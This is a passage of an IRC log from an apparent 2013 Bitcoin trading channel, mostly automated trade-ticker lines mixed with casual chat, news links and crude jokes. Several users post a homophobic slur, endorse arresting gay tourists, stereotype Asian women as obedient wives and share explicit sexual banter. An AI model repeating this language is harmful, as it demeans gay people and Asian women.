[BTCTC] [TAT.ASICMINER] 57 @ 0.0435 = 2.4795 BTC [+] Jul 11 22:56:16 [MPEX] [S.MPOE] 10250 @ 0.00081394 = 8.3429 BTC [-] Jul 11 22:56:20 [MPEX] [S.MPOE] 3050 @ 0.00081578 = 2.4881 BTC [+] Jul 11 22:57:56 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 11 22:57:58 [BTCTC] [ASICMINER-PT] 1 @ 4.236001 BTC [-] Jul 11 22:58:00 [BTCTC] [ASICMINER-PT] 1 @ 4.236 BTC [-] Jul 11 22:58:02 [BTCTC] [ASICMINER-PT] 1 @ 4.235 BTC [-] Jul 11 22:58:03 [BTCTC] [ASICMINER-PT] 2 @ 4.210001 = 8.42 BTC [-] Jul 11 23:00:18 [BTCTC] [DMS.SELLING] 1 @ 0.034998 BTC [+] Jul 11 23:00:42 [HAVELOCK] [AM1] 4 @ 4.325 = 17.3 BTC [-] Jul 11 23:02:18 [BTCTC] [DMS.SELLING] 24 @ 0.034998 = 0.84 BTC [+] Jul 11 23:02:24 http://www.guardian.co.uk/world/2013/jul/11/microsoft-nsa-collaboration-user-data Jul 11 23:02:32 Revealed: how Microsoft handed the NSA access to encrypted messages | World news | guardian.co.uk Jul 11 23:02:49 worst rap lyric of the year: Jul 11 23:02:58 "I came out with womb with my dick hard" Jul 11 23:03:03 J Cole Jul 11 23:03:22 http://www.theregister.co.uk/2013/07/11/report_china_prepares_to_lift_13year_domestic_console_ban/ Jul 11 23:03:39 [BTCTC] [ASICMINER-PT] 4 @ 4.220011 = 16.88 BTC [+] Jul 11 23:05:13 [BTCTC] [DMS.SELLING] 91 @ 0.034998 = 3.1848 BTC [+] Jul 11 23:07:00 Does that mean his mom turned him on?... Jul 11 23:07:43 https://bitcointalk.org/index.php?topic=253560.0 Jul 11 23:07:48 just dont drop the soap TAT Jul 11 23:07:49 2013-7-10 Florida bans Bitcoin Jul 11 23:09:40 it's FUD Jul 11 23:09:49 i know :p Jul 11 23:09:51 bill bans gambling devices specifically Jul 11 23:09:52 [BTCTC] [DMS.SELLING] 109 @ 0.034998 = 3.8148 BTC [+] Jul 11 23:10:23 FL is too dumb to do anything right Jul 11 23:10:35 theyd have to ban bitcoin by mistake Jul 11 23:11:05 and if they did theyd probly ban digital banking all at once too Jul 11 23:11:18 that bill was kinda fucked up Jul 11 23:11:32 it really did put 1000s of places out of business Jul 11 23:11:50 at least 2 local places Jul 11 23:12:04 basically the equivalent of Keno cafes Jul 11 23:12:17 only the State may gamble Jul 11 23:12:49 Friedcat is a lil pimp: http://www.flickr.com/photos/58073152@N07/ Jul 11 23:12:54 http://www.reddit.com/r/BitcoinStocks/comments/1i0p2p/identity_of_friedcat/ Jul 11 23:12:57 Identity of Friedcat? : BitcoinStocks Jul 11 23:15:09 [BTCTC] [TAT.ASICMINER] 100 @ 0.043499 = 4.3499 BTC [-] Jul 11 23:16:14 [BTCTC] [TAT.ASICMINER] 14 @ 0.0435 = 0.609 BTC [+] Jul 11 23:20:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0435 BTC [+] Jul 11 23:21:19 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004249 = 0.0127 BTC [-] Jul 11 23:22:53 ThickAsThieves you saw that bit where they banned everything recently ? Jul 11 23:23:04 [BTCTC] [AMC-PT] 1 @ 0.002401 BTC [-] Jul 11 23:23:38 [BTCTC] [DMS.MINING] 5 @ 0.01525 = 0.0763 BTC [+] Jul 11 23:24:03 [MPEX] [S.MPOE] 7350 @ 0.00081571 = 5.9955 BTC [-] Jul 11 23:24:08 not sure Jul 11 23:24:11 sounds familiar Jul 11 23:24:40 I'm moving sooner than later Jul 11 23:24:49 just trying to choose where Jul 11 23:25:05 i'd prefer a new country Jul 11 23:25:08 but wife isnt ready Jul 11 23:25:47 change wife Jul 11 23:25:48 [HAVELOCK] [AM100] 2 @ 0.042045 = 0.0841 BTC [-] Jul 11 23:26:00 meh Jul 11 23:26:31 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [+] Jul 11 23:26:33 [BTCTC] [BTC-BOND] 11 @ 0.009997 = 0.11 BTC [+] Jul 11 23:26:58 [BTCTC] [TAT.ASICMINER] 92 @ 0.0435 = 4.002 BTC [+] Jul 11 23:27:09 acquire azn wife Jul 11 23:27:24 they listen to their husbands Jul 11 23:27:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004249 BTC [-] Jul 11 23:27:55 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.004249 = 0.0935 BTC [-] Jul 11 23:28:17 [BTCTC] [TAT.ASICMINER] 21 @ 0.04348 = 0.9131 BTC [-] Jul 11 23:28:40 [BTCTC] [DMS.PURCHASE] 2 @ 0.048759 = 0.0975 BTC [-] Jul 11 23:29:02 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.004101 = 0.0246 BTC [-] Jul 11 23:29:04 [BTCTC] [TAT.VIRTUALMINE] 32 @ 0.0041 = 0.1312 BTC [-] Jul 11 23:29:06 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00405 = 0.81 BTC [-] Jul 11 23:29:08 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00402 = 0.402 BTC [-] Jul 11 23:29:10 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.004002 = 2.001 BTC [-] Jul 11 23:29:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004 BTC [-] Jul 11 23:29:46 [HAVELOCK] [HIM] 19 @ 0.275001 = 5.225 BTC [-] Jul 11 23:31:30 [BTCTC] [TAT.ASICMINER] 17 @ 0.0431 = 0.7327 BTC [-] Jul 11 23:31:44 ;;google azn wife btc Jul 11 23:31:44 Calculator for Bitcoins (BTC) Currency Exchange Rate Conversion: ; Convert Bitcoins (BTC) and United States Dollars (USD): Currency ...: ; Azerbaijan - Wikipedia, the free encyclopedia: Jul 11 23:31:59 azerbaijan cool Jul 11 23:32:31 perfect for my mogadishu mansion Jul 11 23:32:46 kakobreklaa: https://bitcointalk.org/index.php?topic=105136.240 Jul 11 23:32:52 that is what you are looking for maybe Jul 11 23:33:34 [BTCTC] [ASICMINER-PT] 1 @ 4.28001 BTC [+] Jul 11 23:33:53 hehe Jul 11 23:35:13 mjr_ : meet brett rossi. http://girls.twistys.com/preview/dum/062013/06-29-2013/brettrossi/ Jul 11 23:35:38 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004249 = 0.0085 BTC [+] Jul 11 23:38:23 [BTCTC] [DMS.PURCHASE] 40 @ 0.048759 = 1.9504 BTC [-] Jul 11 23:38:59 i am going to guess this is nsfw? Jul 11 23:39:12 [BTCTC] [DMS.PURCHASE] 77 @ 0.048759 = 3.7544 BTC [-] Jul 11 23:39:13 correct Jul 11 23:39:19 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.004249 = 0.1275 BTC [+] Jul 11 23:39:40 assuming you dont work in the softcore porn industry Jul 11 23:39:58 [BTCTC] [BASIC-MINING] 3 @ 0.399888 = 1.1997 BTC [-] Jul 11 23:40:00 [BTCTC] [BASIC-MINING] 5 @ 0.399889 = 1.9994 BTC [+] Jul 11 23:40:35 [BTCTC] [DMS.SELLING] 55 @ 0.035187 = 1.9353 BTC [+] Jul 11 23:41:46 that i don't Jul 11 23:41:50 finance is close enough though Jul 11 23:42:33 she's not *that* softcore. fingers inside an all Jul 11 23:42:38 true Jul 11 23:42:49 softcore only shows like the hint of bush Jul 11 23:43:06 [BTCTC] [BTC-BOND] 25 @ 0.009997 = 0.2499 BTC [+] Jul 11 23:43:50 [BTCTC] [DMS.SELLING] 250 @ 0.034998 = 8.7495 BTC [-] Jul 11 23:44:51 [BTCTC] [DMS.PURCHASE] 265 @ 0.048759 = 12.9211 BTC [-] Jul 11 23:45:38 [BTCTC] [COGNITIVE] 1 @ 0.3975 BTC [+] Jul 11 23:48:11 [BTCTC] [DMS.MINING] 18 @ 0.0148 = 0.2664 BTC [-] Jul 11 23:48:13 [BTCTC] [DMS.MINING] 1 @ 0.0142 BTC [-] Jul 11 23:48:15 [BTCTC] [DMS.MINING] 1 @ 0.014102 BTC [-] Jul 11 23:48:16 [BTCTC] [DMS.MINING] 25 @ 0.0141 = 0.3525 BTC [-] Jul 11 23:49:45 0.00282 per mh/s for DMS Jul 11 23:49:57 .004 per mh/s for TAT.VM Jul 11 23:49:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003995 BTC [-] Jul 11 23:50:01 savvy market Jul 11 23:50:01 [BTCTC] [TAT.VIRTUALMINE] 77 @ 0.003995 = 0.3076 BTC [-] Jul 11 23:50:02 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003994 = 0.3994 BTC [-] Jul 11 23:50:05 ut Jul 11 23:50:07 [BTCTC] [TAT.VIRTUALMINE] 60 @ 0.003991 = 0.2395 BTC [-] Jul 11 23:50:15 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003991 = 0.1996 BTC [-] Jul 11 23:50:18 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003991 = 0.012 BTC [-] Jul 11 23:50:20 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.00399 = 0.0998 BTC [-] Jul 11 23:50:22 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003955 = 0.0198 BTC [-] Jul 11 23:50:23 [BTCTC] [TAT.VIRTUALMINE] 301 @ 0.003955 = 1.1905 BTC [-] Jul 11 23:50:25 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00395 = 0.79 BTC [-] Jul 11 23:50:27 [BTCTC] [TAT.VIRTUALMINE] 284 @ 0.003922 = 1.1138 BTC [-] Jul 11 23:50:31 speak of the devil Jul 11 23:50:34 [BTCTC] [RSM] 5 @ 0.01255 = 0.0628 BTC [-] Jul 11 23:50:36 [BTCTC] [RSM] 10 @ 0.01255 = 0.1255 BTC [-] Jul 11 23:50:38 [BTCTC] [RSM] 45 @ 0.012504 = 0.5627 BTC [-] Jul 11 23:52:15 [BTCTC] [DMS.MINING] 10 @ 0.014001 = 0.14 BTC [-] Jul 11 23:52:38 [BTCTC] [DMS.MINING] 1 @ 0.014 BTC [-] Jul 11 23:52:40 [BTCTC] [DMS.MINING] 1 @ 0.014 BTC [-] Jul 11 23:52:53 [BTCTC] [ASICMINER-PT] 1 @ 4.375 BTC [+] Jul 11 23:52:58 [HAVELOCK] [AM100] 17 @ 0.041262 = 0.7015 BTC [-] Jul 11 23:53:17 [BTCTC] [DMS.MINING] 3 @ 0.014 = 0.042 BTC [-] Jul 11 23:53:19 [BTCTC] [DMS.MINING] 202 @ 0.0141 = 2.8482 BTC [+] Jul 11 23:53:33 ;;estimate Jul 11 23:53:34 Next difficulty estimate | 31892526.4847 based on data since last change | 30025622.6406 based on data for last three days Jul 11 23:53:53 ;;bcstats Jul 11 23:53:56 [BTCTC] [DMS.MINING] 3 @ 0.0141 = 0.0423 BTC [+] Jul 11 23:53:56 Current Blocks: 246100 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 1867 blocks | Next Difficulty In About: 1 week, 2 days, 23 hours, 36 minutes, and 53 seconds | Next Difficulty Estimate: 31892526.4847 | Estimated Percent Change: 21.89993 Jul 11 23:56:20 [HAVELOCK] [AM100] 5 @ 0.04126105 = 0.2063 BTC [-] Jul 11 23:58:12 [BTCTC] [GSDPT] 7 @ 0.002199 = 0.0154 BTC [-] Jul 12 00:00:57 [BTCTC] [DMS.PURCHASE] 75 @ 0.048759 = 3.6569 BTC [-] Jul 12 00:06:41 [BTCTC] [DMS.MINING] 77 @ 0.014199 = 1.0933 BTC [+] Jul 12 00:06:43 [BTCTC] [DMS.MINING] 23 @ 0.0142 = 0.3266 BTC [+] Jul 12 00:09:00 [HAVELOCK] [AM100] 90 @ 0.04126105 = 3.7135 BTC [-] Jul 12 00:10:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.0431 = 0.1724 BTC [-] Jul 12 00:12:32 [BTCTC] [S.MPOE-PT] 2 @ 0.000945 = 0.0019 BTC [+] Jul 12 00:12:39 [BTCTC] [AMC-PT] 13 @ 0.002488 = 0.0323 BTC [+] Jul 12 00:13:47 [BTCTC] [ASICMINER-PT] 1 @ 4.375 BTC [+] Jul 12 00:16:06 [BTCTC] [AMC-PT] 37 @ 0.002489 = 0.0921 BTC [+] Jul 12 00:17:11 [BTCTC] [DMS.PURCHASE] 23 @ 0.048759 = 1.1215 BTC [-] Jul 12 00:20:25 [BTCTC] [AMC-PT] 355 @ 0.002401 = 0.8524 BTC [-] Jul 12 00:20:27 [BTCTC] [AMC-PT] 144 @ 0.002401 = 0.3457 BTC [-] Jul 12 00:22:17 [BTCTC] [DMS.MINING] 1 @ 0.0142 BTC [+] Jul 12 00:23:20 [BTCTC] [DMS.MINING] 35 @ 0.0142 = 0.497 BTC [+] Jul 12 00:24:11 [BTCTC] [S.BBET-PT] 5 @ 0.002175 = 0.0109 BTC [+] Jul 12 00:25:05 [HAVELOCK] [AM100] 50 @ 0.042146 = 2.1073 BTC [+] Jul 12 00:43:15 [BTCTC] [DMS.PURCHASE] 30 @ 0.048759 = 1.4628 BTC [-] Jul 12 00:43:38 my how time flies Jul 12 00:43:45 [BTCTC] [DMS.MINING] 1 @ 0.014199 BTC [-] Jul 12 00:45:23 [BTCTC] [AMC-PT] 9 @ 0.002401 = 0.0216 BTC [-] Jul 12 00:45:30 [MPEX] [S.MPOE] 932 @ 0.00081571 = 0.7602 BTC [-] Jul 12 00:45:32 [MPEX] [S.MPOE] 14968 @ 0.00081578 = 12.2106 BTC [+] Jul 12 00:46:01 [BTCTC] [AMC-PT] 54 @ 0.002489 = 0.1344 BTC [+] Jul 12 00:46:17 didnt even know Burnsy was here Jul 12 00:46:45 [BTCTC] [DMS.MINING] 14 @ 0.014199 = 0.1988 BTC [-] Jul 12 00:49:41 [BTCTC] [DMS.MINING] 6 @ 0.014199 = 0.0852 BTC [-] Jul 12 00:49:43 [BTCTC] [DMS.MINING] 4 @ 0.0142 = 0.0568 BTC [+] Jul 12 00:50:28 [BTCTC] [DMS.MINING] 10 @ 0.0142 = 0.142 BTC [+] Jul 12 00:55:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.042636 = 1.0659 BTC [-] Jul 12 00:56:06 [BTCTC] [BASIC-MINING] 5 @ 0.399888 = 1.9994 BTC [-] Jul 12 00:56:24 [BTCTC] [TAT.ASICMINER] 50 @ 0.042635 = 2.1318 BTC [-] Jul 12 00:56:58 [BTCTC] [TAT.ASICMINER] 59 @ 0.042632 = 2.5153 BTC [-] Jul 12 00:56:59 [BTCTC] [RSM] 17 @ 0.013 = 0.221 BTC [+] Jul 12 00:57:10 [BTCTC] [BASIC-MINING] 8 @ 0.399889 = 3.1991 BTC [+] Jul 12 00:57:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.042631 = 0.2132 BTC [-] Jul 12 00:57:46 [BTCTC] [BASIC-MINING] 5 @ 0.399888 = 1.9994 BTC [-] Jul 12 00:58:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.04263 = 0.0853 BTC [-] Jul 12 00:58:22 [BTCTC] [BASIC-MINING] 5 @ 0.39989 = 1.9995 BTC [+] Jul 12 00:58:37 [MPEX] [S.MPOE] 9204 @ 0.00081578 = 7.5084 BTC [+] Jul 12 00:58:47 [BTCTC] [TAT.ASICMINER] 48 @ 0.04263 = 2.0462 BTC [-] Jul 12 00:58:49 [BTCTC] [TAT.ASICMINER] 57 @ 0.04263 = 2.4299 BTC [-] Jul 12 00:58:52 [BTCTC] [BASIC-MINING] 5 @ 0.39988 = 1.9994 BTC [-] Jul 12 00:59:17 [BTCTC] [BASIC-MINING] 4 @ 0.39998 = 1.5999 BTC [+] Jul 12 00:59:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.042629 = 0.0853 BTC [-] Jul 12 00:59:53 [BTCTC] [BASIC-MINING] 1 @ 0.39997 BTC [-] Jul 12 01:00:19 [BTCTC] [TAT.ASICMINER] 105 @ 0.042619 = 4.475 BTC [-] Jul 12 01:00:22 [BTCTC] [BASIC-MINING] 4 @ 0.39997 = 1.5999 BTC [-] Jul 12 01:00:23 [HAVELOCK] [AM1] 1 @ 4.4444 BTC [+] Jul 12 01:00:51 [BTCTC] [TAT.ASICMINER] 7 @ 0.0426 = 0.2982 BTC [-] Jul 12 01:01:06 [HAVELOCK] [AM1] 2 @ 4.39 = 8.78 BTC [-] Jul 12 01:01:12 [HAVELOCK] [AM100] 2 @ 0.042146 = 0.0843 BTC [+] Jul 12 01:01:24 [BTCTC] [BASIC-MINING] 1 @ 0.39998 BTC [+] Jul 12 01:01:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.042501 BTC [-] Jul 12 01:02:03 [BTCTC] [BASIC-MINING] 5 @ 0.39997 = 1.9999 BTC [-] Jul 12 01:02:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.0425 = 0.2125 BTC [-] Jul 12 01:02:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.0425 = 0.425 BTC [-] Jul 12 01:02:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 12 01:02:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.0421 = 0.1263 BTC [-] Jul 12 01:02:47 [BTCTC] [ASICMINER-PT] 1 @ 4.375 BTC [+] Jul 12 01:02:51 [HAVELOCK] [VTX] 1 @ 0.822001 BTC [+] Jul 12 01:02:53 [HAVELOCK] [VTX] 1 @ 0.822 BTC [-] Jul 12 01:02:54 [HAVELOCK] [VTX] 2 @ 0.8211 = 1.6422 BTC [-] Jul 12 01:03:11 [BTCTC] [BASIC-MINING] 5 @ 0.39998 = 1.9999 BTC [+] Jul 12 01:03:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.04203 = 0.3362 BTC [-] Jul 12 01:03:31 [BTCTC] [BASIC-MINING] 4 @ 0.39999 = 1.6 BTC [+] Jul 12 01:03:33 [BTCTC] [BASIC-MINING] 2 @ 0.4 = 0.8 BTC [+] Jul 12 01:03:34 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [+] Jul 12 01:03:36 [BTCTC] [BASIC-MINING] 5 @ 0.4 = 2 BTC [+] Jul 12 01:03:37 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [+] Jul 12 01:03:37 [BTCTC] [BASIC-MINING] 10 @ 0.4 = 4 BTC [+] Jul 12 01:03:39 [BTCTC] [BASIC-MINING] 10 @ 0.41 = 4.1 BTC [+] Jul 12 01:03:40 [BTCTC] [BASIC-MINING] 10 @ 0.41 = 4.1 BTC [+] Jul 12 01:03:41 [BTCTC] [BASIC-MINING] 18 @ 0.42 = 7.56 BTC [+] Jul 12 01:03:42 [BTCTC] [BASIC-MINING] 5 @ 0.43 = 2.15 BTC [+] Jul 12 01:03:44 [BTCTC] [BASIC-MINING] 50 @ 0.45 = 22.5 BTC [+] Jul 12 01:03:45 [BTCTC] [BASIC-MINING] 61 @ 0.45 = 27.45 BTC [+] Jul 12 01:03:49 [BTCTC] [BASIC-MINING] 4 @ 0.39999 = 1.6 BTC [-] Jul 12 01:04:16 [BTCTC] [BASIC-MINING] 1 @ 0.399979 BTC [-] Jul 12 01:05:54 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 12 01:08:35 [BTCTC] [DMS.PURCHASE] 6 @ 0.048759 = 0.2926 BTC [-] Jul 12 01:10:46 [MPEX] [S.MPOE] 6250 @ 0.00081565 = 5.0978 BTC [-] Jul 12 01:14:14 [BTCTC] [CRYPTO-TRADE] 8 @ 0.199999 = 1.6 BTC [+] Jul 12 01:16:49 [HAVELOCK] [AM100] 11 @ 0.042146 = 0.4636 BTC [+] Jul 12 01:17:43 [HAVELOCK] [AM100] 25 @ 0.0416 = 1.04 BTC [-] Jul 12 01:18:16 [BTCTC] [ASICMINER-PT] 1 @ 4.305 BTC [-] Jul 12 01:22:45 [HAVELOCK] [AM100] 60 @ 0.04126105 = 2.4757 BTC [-] Jul 12 01:22:47 [HAVELOCK] [AM100] 11 @ 0.04105 = 0.4516 BTC [-] Jul 12 01:23:22 [BTCTC] [AMC-PT] 309 @ 0.002489 = 0.7691 BTC [+] Jul 12 01:23:24 [BTCTC] [AMC-PT] 191 @ 0.00249 = 0.4756 BTC [+] Jul 12 01:24:18 ever see a blonde azn hot bitch Jul 12 01:24:30 [BTCTC] [BASIC-MINING] 15 @ 0.39 = 5.85 BTC [-] Jul 12 01:24:38 like i think there was one in a george michael video Jul 12 01:26:54 [BTCTC] [DMS.PURCHASE] 21 @ 0.048759 = 1.0239 BTC [-] Jul 12 01:28:07 [MPEX] [S.MPOE] 4550 @ 0.00081259 = 3.6973 BTC [-] Jul 12 01:28:38 [BTCTC] [COGNITIVE] 1 @ 0.39 BTC [-] Jul 12 01:31:58 just got an email from coinbase Jul 12 01:32:00 Good news! All level 2 accounts can now purchase bitcoin instantly on Coinbase! Jul 12 01:32:00 With this change comes one additional requirement: all level 2 accounts will now need to complete an identity verification step. Jul 12 01:32:00 To restore your level 2 status please complete your identity verification from the verifications page. Jul 12 01:32:25 good news! who are you again? Jul 12 01:33:09 lol. Jul 12 01:34:37 lmao Jul 12 01:34:54 good news! you can now suck my cock! Jul 12 01:35:05 with this change comes a requirement to throw away all your clothes. Jul 12 01:35:22 to restore access to your house please go (naked, on foot) to the closest humiliation center Jul 12 01:35:41 where you will be given a free rectal examination which will be broadcast on live webcam at no extra charge to you Jul 12 01:35:47 (special conditions apply) Jul 12 01:35:50 [BTCTC] [DMS.MINING] 1 @ 0.014189 BTC [-] Jul 12 01:35:58 [HAVELOCK] [AM100] 3 @ 0.04105 = 0.1232 BTC [-] Jul 12 01:36:09 [HAVELOCK] [AM100] 57 @ 0.04080101 = 2.3257 BTC [-] Jul 12 01:37:08 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004237 = 0.0085 BTC [+] Jul 12 01:39:52 [BTCTC] [ASICMINER-PT] 1 @ 4.304 BTC [-] Jul 12 01:39:54 [BTCTC] [ASICMINER-PT] 1 @ 4.290001 BTC [-] Jul 12 01:40:23 [BTCTC] [TAT.ASICMINER] 20 @ 0.04251 = 0.8502 BTC [+] Jul 12 01:41:46 The special conditions being if you're not over 15 foot tall, you don't get to restore access to your house. You just get another round at the humiliation center ad infinitum. Jul 12 01:42:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.042501 BTC [-] Jul 12 01:42:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.042501 = 0.255 BTC [-] Jul 12 01:43:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.0425 = 0.2125 BTC [-] Jul 12 01:44:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0425 = 0.2125 BTC [-] Jul 12 01:45:13 http://www.travelandescape.ca/2013/07/russia-says-it-will-arrest-openly-gay-tourists Jul 12 01:45:17 [HAVELOCK] [AM1] 1 @ 4.45 BTC [+] Jul 12 01:45:22 Russia Says It Will Arrest Openly Gay Tourists | Travel and Escape Jul 12 01:45:23 [BTCTC] [DMS.MINING] 1 @ 0.014189 BTC [-] Jul 12 01:47:09 [BTCTC] [AMC-PT] 308 @ 0.00249 = 0.7669 BTC [+] Jul 12 01:48:14 bitbet's end-of-July network difficulty bet is gonna be very close. Funny how that happens. Jul 12 01:48:16 [BTCTC] [AMC-PT] 28 @ 0.002498 = 0.0699 BTC [+] Jul 12 01:48:18 totally important news Jul 12 01:49:19 [BTCTC] [AMC-PT] 117 @ 0.002498 = 0.2923 BTC [+] Jul 12 01:50:58 [BTCTC] [AMC-PT] 133 @ 0.0025 = 0.3325 BTC [+] Jul 12 01:52:42 [HAVELOCK] [AM100] 50 @ 0.040812 = 2.0406 BTC [+] Jul 12 01:53:07 [HAVELOCK] [VTX] 1 @ 0.949999 BTC [+] Jul 12 01:53:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.042999 = 0.086 BTC [+] Jul 12 01:54:43 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [+] Jul 12 01:58:54 [BTCTC] [BASIC-MINING] 3 @ 0.428999 = 1.287 BTC [+] Jul 12 01:58:56 [BTCTC] [BASIC-MINING] 5 @ 0.429 = 2.145 BTC [+] Jul 12 01:58:57 [BTCTC] [BASIC-MINING] 5 @ 0.43 = 2.15 BTC [+] Jul 12 01:58:59 [BTCTC] [BASIC-MINING] 15 @ 0.44 = 6.6 BTC [+] Jul 12 02:00:09 zebedee_ again, right ? Jul 12 02:00:13 last month was just like tjhat Jul 12 02:00:21 Namworld just about. Jul 12 02:00:34 [HAVELOCK] [AM100] 8 @ 0.041588 = 0.3327 BTC [+] Jul 12 02:05:37 [BTCTC] [ASICMINER-PT] 1 @ 4.3799 BTC [+] Jul 12 02:06:26 [BTCTC] [DMS.MINING] 2 @ 0.014175 = 0.0284 BTC [-] Jul 12 02:07:19 ThickAsThieves http://trilema.com/2013/the-masters-of-the-snark-and-other-lessons-in-public-communication/ Jul 12 02:07:20 you inspire. Jul 12 02:07:25 [BTCTC] [COGNITIVE] 3 @ 0.39 = 1.17 BTC [-] Jul 12 02:10:09 :) Jul 12 02:10:26 i can't take credit for Coinbase's wordsmithing though Jul 12 02:10:43 Diablo-D3, look you're famous now! Jul 12 02:11:25 ima have trilema engraved in glass Jul 12 02:11:28 with that new process Jul 12 02:11:32 that way we're all 4evar Jul 12 02:14:54 sweet Jul 12 02:16:53 wait what? Jul 12 02:19:15 [HAVELOCK] [AM100] 82 @ 0.041589 = 3.4103 BTC [+] Jul 12 02:19:16 [HAVELOCK] [AM100] 118 @ 0.041589 = 4.9075 BTC [+] Jul 12 02:19:41 [BTCTC] [ASICMINER-PT] 1 @ 4.325 BTC [-] Jul 12 02:20:02 [BTCTC] [TAT.ASICMINER] 8 @ 0.042999 = 0.344 BTC [+] Jul 12 02:20:27 [HAVELOCK] [AM100] 40 @ 0.041589 = 1.6636 BTC [+] Jul 12 02:20:34 [BTCTC] [TAT.ASICMINER] 12 @ 0.0425 = 0.51 BTC [-] Jul 12 02:21:54 [BTCTC] [TAT.ASICMINER] 9 @ 0.043299 = 0.3897 BTC [+] Jul 12 02:21:55 [BTCTC] [TAT.ASICMINER] 8 @ 0.0433 = 0.3464 BTC [+] Jul 12 02:22:01 [BTCTC] [BASIC-MINING] 10 @ 0.401003 = 4.01 BTC [-] Jul 12 02:22:03 [BTCTC] [BASIC-MINING] 9 @ 0.401002 = 3.609 BTC [-] Jul 12 02:22:05 [BTCTC] [BASIC-MINING] 3 @ 0.401 = 1.203 BTC [-] Jul 12 02:22:18 http://blog.coinbase.com/post/55203204550/instant-bitcoin-purchases-at-coinbase Jul 12 02:22:28 [BTCTC] [BASIC-MINING] 1 @ 0.40001 BTC [-] Jul 12 02:22:30 [BTCTC] [BASIC-MINING] 10 @ 0.4 = 4 BTC [-] Jul 12 02:22:32 [BTCTC] [BASIC-MINING] 10 @ 0.4 = 4 BTC [-] Jul 12 02:22:33 [BTCTC] [BASIC-MINING] 18 @ 0.39 = 7.02 BTC [-] Jul 12 02:22:35 [BTCTC] [BASIC-MINING] 10 @ 0.39 = 3.9 BTC [-] Jul 12 02:25:35 [HAVELOCK] [AM100] 4 @ 0.041589 = 0.1664 BTC [+] Jul 12 02:27:01 Russia has the right idea Jul 12 02:27:27 there is NOTHING instant about coinbase and their lies Jul 12 02:30:59 [BTCTC] [TAT.ASICMINER] 11 @ 0.0425 = 0.4675 BTC [-] Jul 12 02:32:12 [BTCTC] [AMC-PT] 225 @ 0.0025 = 0.5625 BTC [+] Jul 12 02:34:00 [HAVELOCK] [AM100] 107 @ 0.041589 = 4.45 BTC [+] Jul 12 02:34:00 [HAVELOCK] [AM100] 2 @ 0.04159 = 0.0832 BTC [+] Jul 12 02:34:02 [HAVELOCK] [AM100] 10 @ 0.041598 = 0.416 BTC [+] Jul 12 02:34:03 [HAVELOCK] [AM100] 245 @ 0.0416 = 10.192 BTC [+] Jul 12 02:34:20 [HAVELOCK] [AM100] 1 @ 0.041089 BTC [-] Jul 12 02:36:43 tourists all look like faggots to me Jul 12 02:36:56 I wish my city would ban them altogether Jul 12 02:37:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.04251 BTC [+] Jul 12 02:37:35 [BTCTC] [TAT.ASICMINER] 37 @ 0.0425 = 1.5725 BTC [-] Jul 12 02:38:06 [BTCTC] [DMS.MINING] 6 @ 0.014149 = 0.0849 BTC [-] Jul 12 02:40:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 12 02:40:45 KRS- "faggots allowrd on the street only if leashed and supervised by a pro stripper" Jul 12 02:41:35 [BTCTC] [DMS.PURCHASE] 2 @ 0.048759 = 0.0975 BTC [-] Jul 12 02:42:12 [MPEX] [S.MPOE] 4200 @ 0.00081524 = 3.424 BTC [+] Jul 12 02:42:15 [MPEX] [S.MPOE] 10502 @ 0.00081578 = 8.5673 BTC [+] Jul 12 02:47:40 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 12 02:48:03 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 12 02:50:21 [BTCTC] [LTC-ATF.B2] 50 @ 0.010101 = 0.5051 BTC [-] Jul 12 02:50:44 [BTCTC] [BTC-BOND] 50 @ 0.009905 = 0.4953 BTC [-] Jul 12 02:52:06 [BTCTC] [TAT.ASICMINER] 37 @ 0.0425 = 1.5725 BTC [-] Jul 12 02:52:18 [BTCTC] [DMS.MINING] 4 @ 0.01415 = 0.0566 BTC [+] Jul 12 02:54:00 [BTCTC] [DMS.MINING] 22 @ 0.01415 = 0.3113 BTC [+] Jul 12 02:55:03 [BTCTC] [DMS.MINING] 33 @ 